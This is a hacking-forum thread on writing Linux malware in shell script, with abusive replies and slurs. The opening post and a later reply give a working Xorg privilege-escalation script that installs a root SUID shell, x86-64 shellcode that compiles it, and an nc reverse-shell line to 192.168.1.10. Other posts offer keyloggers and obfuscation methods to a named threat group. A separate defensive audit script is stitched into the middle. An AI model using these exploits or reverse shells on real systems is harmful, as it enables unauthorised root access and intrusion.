User Controls
Sh/Bash based malware for *Nix.
-
2021-07-24 at 7:24 AM UTC
Welcome to another edition of Sophie's Cyber Shenanigans. In this thread, i got some unconventional ways to work on *Nix based malware. And a couple questions for the level 97 shell script wizards.
So i am experimenting with shell scripts, to find out what is and isn't viable should i want to create a shell script based malware for loonix. Why shell script? They're easily obfuscated, a bunch of utils have PE/Static binary formats you can bring along, or deploy remotely, and all distros have `Sh` and almost always `Bash` as far as i am aware.
What's more, shell scripts, allow one to invoke commands and operations from any scripting lang that have their interpreter installed on the distro you are targeting 'out of the box' as it. Which tend to be quite a few.
Chances are you'll have access to: Perl, Python, Lua, TclSh, M4(Plus other Macro 'langs') and if you're lucky PHP, Ruby, Node and so on and so forth.
Another benefit of using `Sh` or `Bash` is that you don't have to worry about compatibility issues. Should you want to make use of payloads written in let's say C, you have the opportunity to perform Recon simply with the `uname -svm` command and then you'll have the proper architecture and kernel version. Which is great to know if you want to write an exploit for the system you're on.
Here's an example.
#!/bin/bash
# There are a bunch of vulns in the Xorg server and related utils like
#
# X.Org xorg-x11-xfs - Local Race Condition
# xorg-x11-server - 'inittab Local Privilege Escalation
#
# And much more, we're gonna do the second one as an example
#
# When ##!!## occurs in the script i got some annotations below
#
cat << EOF > /tmp/x_orgasm
cp /bin/sh /usr/local/bin/pwned ##!!##_1
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
chmod 4777 /usr/local/bin/pwned
EOF
chmod +x /tmp/x_orgasm
# prepare your anus
cd /etc
Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
sleep 5
pkill Xorg ##!!##_4
sleep 120
ls -l /etc/crontab*
ls -l /usr/local/bin/pwned
# Start elevated Sh
/usr/local/bin/pwned
##!!##_1
Before you say: you can't just copy /bin/sh. Well we don't really need to the line after that builds a Sh shell too.
If you're afraid we won't have permissions for `gcc` here's something that'll do exactly the same with UID 0.
Alternatively we could ship a shell in Asm with the payload up top.
##!!##_2
/tmp and some of the other directories featured here get mounted as NOSUID which is good. Because NOSUID beats root.
/usr/local/bin is part of the $PATH and has MODE 2775/drwxrwsr-x
##!!##_3
The operation here is what triggers the bug. Without getting too much into the weeds, killing Xorg at ##!!##_4 with pkill will cause inittab to restart the cronjob related to Xorg that we changed with the operation we ran previously, which then starts our 'pwned' Sh with root privileges.
Obfuscation
There's tools to obfuscate bash. Which is great. Here's an example of this same script obfuscated with the methods below.
String/Hex Hash, 1 Iteration
Token/ForCode, 1 Iteration
Find the result here
Or if you prefer a picture check the spoiler out below.
Anyway, i hope you found that informative. However before you go i do actually have a question for the level 97 shell script wizards.
I want to have a function in a shell script that i can call with different commands, so `cmd_func cat /etc/passwd`. My current implementation looks like this:
#!/usr/bin/env -S sh\_"umask\_700"\_-f
# BTW This is legal right ^
#
# I'm U_masking because i am writing stuff out
# Under a specific user account
buff_ops()
{ # I want to run it through a FIFO pipe/buffer in fact it is a requirement.
cmd=$0
arg=$1
mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
};
buff_ops CMD ARG # <- is what i want
I figured it should be good since stuff like this works also:
rm -f x; mknod x p && nc 192.168.1.10 1337 0<x | /bin/bash 1>x
Thicc threads niggas. One on low level security and dev incoming soon as well. -
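The two hardening points the post itself raises (nosuid on /tmp, and a SUID binary dropped with mode 4777 into a group-writable /usr/local/bin) as a small audit script. This is an added example, not code from the original post: it checks whether a mount point carries nosuid from a /proc/mounts-style file and flags setuid/setgid files that are also world-writable. The function names are assumed, and scan_dir assumes GNU stat -c.

```shell
#!/bin/sh
# Added example (not from the thread): defender-side checks for the two
# conditions the OP points at, nosuid on temp mounts and a 4777 SUID drop.

# has_nosuid MOUNTPOINT [MOUNTS_FILE]: exit 0 if the mount point is mounted
# nosuid. Reads /proc/mounts by default; a file may be passed for testing.
has_nosuid() {
    awk -v mp="$1" '
        $2 == mp { n = split($4, o, ","); for (i = 1; i <= n; i++) if (o[i] == "nosuid") found = 1 }
        END { exit found ? 0 : 1 }' "${2:-/proc/mounts}"
}

# risky_mode OCTAL: exit 0 if the mode has setuid or setgid set AND is
# world-writable (e.g. 4777): anyone could replace a privileged binary.
risky_mode() {
    m=$1
    while [ ${#m} -lt 4 ]; do m=0$m; done   # pad "777" to "0777"
    case ${m%???} in                          # first digit: special bits
        2|3|4|5|6|7) ;;
        *) return 1 ;;
    esac
    case ${m#???} in                          # last digit: "other" bits
        2|3|6|7) return 0 ;;
        *) return 1 ;;
    esac
}

# flag_risky_lines: read "OCTALMODE PATH" lines on stdin, print risky paths.
flag_risky_lines() {
    while read -r mode path; do
        if risky_mode "$mode"; then printf '%s\n' "$path"; fi
    done
}

# scan_dir DIR: apply the check to real files (assumes GNU stat -c).
scan_dir() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -exec stat -c '%a %n' {} + 2>/dev/null | flag_risky_lines
}

# Usage: scan_dir /usr/local/bin; has_nosuid /tmp || echo "/tmp lacks nosuid"
```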
2021-07-24 at 12:10 PM UTC
I know a little about python. Do you have any keyloggers that would email to any email? Preferably something besides gmail.
And is there anyway to get something to autorun on windows without an arduino? With a flash drive or dvd? -
2021-07-25 at 7:41 AM UTC
-
2021-07-25 at 11:58 PM UTC
I also have a keylogger that'll send you the data over UDP, one byte at a time. Which is good because that makes it more stealth. Would you like some random malware sir? I got malware out the ass, custom made by yours truly, OSS, and BH.
We'll do luck of the draw. I'll number 10 random malwares, you pick a number. Ready?
rand=$[ $RANDOM % 10 ] && echo -e $rand
Anyway, i wish more people would be interested or competent in terms of *Nix malware. -
2021-09-25 at 1:12 PM UTC
I'm an inspiration to Threat Actors all around the world.
https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera
Sh/Bash based malware is the future of loonix malware. Using native utils for offensive operations is almost always superior to shipping in a whole ass malware, especially with regards to Linux, no compatibility issues. It's great. -
2021-09-25 at 4:10 PM UTC
In the xorg hack, why do you bother with the cp of /bin/sh when you already write that with gcc and chmod it?
-
2021-09-25 at 4:11 PM UTC
-
2021-09-25 at 4:23 PM UTC
Also TeamTNT, if you're reading this. Don't download your payloads from a C2 server that literally has the name of the Operation in the domain. And, you guys need to obfuscate that shell script. I got a couple really good ways among my TTPs but if i share them they won't be as effective any more.
I can design a new Obfuscation method however. And you guys should be able to as well, if you can't i'll trade a custom designed method, for something of equal value. Preferably 0day. Ok admittedly that's a steep price.
All of this is for legitimate research purposes of course.
edit: Oops * shell script not shell code lol -
2021-09-25 at 4:34 PM UTC
-
2021-09-25 at 4:48 PM UTC
-
2021-09-25 at 5:05 PM UTC
-
2021-09-25 at 6:05 PM UTC
If you look closely at this part:
cat << EOF > /tmp/x_orgasm
cp /bin/sh /usr/local/bin/pwned ##!!##_1
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
chmod 4777 /usr/local/bin/pwned
EOF
You can tell that the operation above writes out everything between EOF to the /tmp directory, after which it's made executable with chmod +x. That means it can be run as a shell script.
Here we are making sure that cronjob related to Xorg which has the permissions required will start the script in /tmp with the permissions we need.
cd /etc
Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
sleep 5
pkill Xorg
Once the script is executed with the new permissions we can do the operations defined there without issue.
Even if something goes wrong i write this:
global _start
section .text
_start:
push 59
pop rax
cdq
push rdx
mov rbx, 0x6363672f6e69622f
push rbx
mov rbx, 0x7273752f2f2f2f2f
push rbx
push rsp
pop rdi
push rdx
mov rbx, 0xffffffff9cd19b9a
not rbx
push rbx
mov rbx, 0x91888fd08f928bd0
not rbx
push rbx
push rsp
pop r8
push rdx
mov rbx, 0xffffffffffff90d2
not rbx
push rbx
push rsp
pop r9
push rdx
mov rbx, 0xffffffff9b9a9188
not rbx
push rbx
mov rbx, 0x8fd091969dd0939e
not rbx
push rbx
mov rbx, 0x9c9093d08d8c8ad0
not rbx
push rbx
push rsp
pop r10
push rdx
push rsp
pop rdx
push r10
push r9
push r8
push rdi
push rsp
pop rsi
syscall
What that does is invoke gcc with execve with UID 0, so the shell we wrote out with
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gets compiled the way we want to regardless of system permissions. -
2021-09-25 at 6:07 PM UTC
It's not called exploits for nothing (n_n")
-
2021-09-25 at 7:24 PM UTC
-
2021-09-26 at 12:25 AM UTC
Originally posted by troon: You don't have a fucking clue what you're talking about, do you?
Last i checked you were the one that was asking a million questions about the subject at hand. See those four 'thanks' my post got? Those are from people who definitely know what they are talking about. Just because you're too fucking ignorant to understand what's going on in this thread doesn't mean that everyone is as incompetent as you. I even fucking spelled it out for you. If everyone else here understands the subject matter then maybe you should consider that you're actually the one that doesn't have a fucking clue.
Why don't you shut the fuck up, read up on offensive security and shell scripting, and look into the vulnerability i mentioned in the OP. Then come back and talk shit to me. -
2021-09-26 at 7:22 AM UTC
I wish I had more time for shit like this
The things you regret at the end and why lol irony is a bitch -
2021-09-26 at 6:04 PM UTC
Originally posted by Sophie: Last i checked you were the one that was asking a million questions … <crap> … I even fucking spelled it out for you
You spelled fuck all out. You were talking total shit. Because you know shit.
"Also, TeamTNT..." - you are having a fucking laugh. Or retarded, not sure yet. -
2021-10-07 at 2:49 AM UTC
nice xorg vuln, is it a zero-day? I've never seen it before.. if it's 0day then damn nice :P
also, nice thread in general. I've got a ring3/userland linux rootkit based on DR0 (debug register, as opposed to LD_PRELOAD / dynamic linker) which I'll post tomorrow... it's multi-arch too (inline asm for each architecture.. it'll use uname -m or /proc entries to detect the architecture in use, then run the relevant arch-specific inline assembly from there).
Also, I said it's userland... well, that's not fully true. It's also active in kernelspace. It's just residing in userland/ring3 rather than at ring0, so that if the fucker updates their kernel they're still hooked. So basically it's living in userland but is performing ring3->ring0 hooking
I suck dick at C(++), ASM, and kernel stuff in general... so I'm actually really fucking happy with how this kit has been coming along. It's only the 2nd kit I ever wrote too. First used LD_PRELOAD.
The bash obfuscation you posted has inspired me to post a thread detailing a bunch of my bash obfuscation tricks, too :)
EDIT:
lol... do we know each other btw? If so, who are you? PM if you don't wanna reveal your nick here.
Just noticed you posted this https://niggasin.space/thread/5020 (that fuzzer is incredibly gross btw lmao, wrote it for the memez hence the goto(); spaghetti code, zero bound checks anywhere, and user inputs passed to syscalls errywhere. I wrote a proper flash fuzzer in ruby. I'll upload that one for you. It uses the same lists, but it opens proper sockets etc rather than doing fucking gnome-www-browser loool) -
2021-10-07 at 11:22 AM UTC
Are you maybe a schizo-posting pedo?
A zero day multi-arch ring3 to ring0? I fucking wait with bated breath.
I'm not sure whether to laugh or cringe. -
2021-10-07 at 1:16 PM UTC
I got a DoS zero-day in a single line of pure bash script:
sudo shutdown -h now
Let me walk you through it.
The 'sudo' command does stuff.
The 'shutdown' command is self-explanatory. It shuts things down.
The '-h' is what we call a 'flag', but I've seen it referred to as a 'parameter'.
And the 'now' command is in there, but I don't really know what it does. DO NOT OMIT IT OR THE HACK WILL NOT WORK.
If it asks for a password, then you're on your own. I can't help you on that bit.
Oh, if anyone from Fin7 is reading this, can you pick up a carton of semi-skimmed from the shops on your way home?
You're all welcome.